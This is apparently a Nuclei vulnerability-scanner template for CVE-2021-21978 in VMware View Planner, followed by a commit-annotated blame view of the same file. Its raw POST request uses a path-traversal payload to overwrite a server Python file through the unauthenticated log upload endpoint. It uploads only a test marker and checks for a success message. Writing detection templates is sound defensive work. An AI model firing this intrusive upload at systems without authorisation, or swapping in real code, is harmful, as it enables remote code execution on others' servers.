nuclei-templates/cves/2021/CVE-2021-21978.yaml

id: CVE-2021-21978

info:
  name: VMware View Planner <4.6 SP1- Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
    An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
    file leading to remote code execution within the logupload container.
  reference:
    - https://twitter.com/osama_hroot/status/1367258907601698816
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21978
    - https://www.vmware.com/security/advisories/VMSA-2021-0003.html
    - http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-21978
    cwe-id: CWE-434
  tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive

requests:
  - raw:
      - |
        POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="logfile"; filename=""
        Content-Type: text/plain

        POC_TEST

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "File uploaded successfully."
        part: body
      - type: dsl
        dsl:
          - "len(body) == 28" # length of "\nFile uploaded successfully."

# Enhanced by mp on 2022/05/05
:fire: Add CVE-2021-21978 2021-03-05 08:27:05 +00:00			`id: CVE-2021-21978`

			`info:`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`name: VMware View Planner <4.6 SP1- Remote Code Execution`
:fire: Add CVE-2021-21978 2021-03-05 08:27:05 +00:00			`author: dwisiswant0`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.`
:fire: Add CVE-2021-21978 2021-03-05 08:27:05 +00:00			`An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted`
			`file leading to remote code execution within the logupload container.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://twitter.com/osama_hroot/status/1367258907601698816`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-21978`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://www.vmware.com/security/advisories/VMSA-2021-0003.html`
			`- http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2021-21978`
			`cwe-id: CWE-434`
Merge branch 'master' into fileupload 2022-09-01 10:51:29 +00:00			`tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive`
:fire: Add CVE-2021-21978 2021-03-05 08:27:05 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Accept: text/html`
			`Referer: {{BaseURL}}`
			`Connection: close`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="logfile"; filename=""`
			`Content-Type: text/plain`

			`POC_TEST`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "File uploaded successfully."`
			`part: body`
			`- type: dsl`
			`dsl:`
Dashboard Content Enhancements (#4338) Dashboard Content Enhancements 2022-05-09 16:12:52 +00:00			`- "len(body) == 28" # length of "\nFile uploaded successfully."`

			`# Enhanced by mp on 2022/05/05`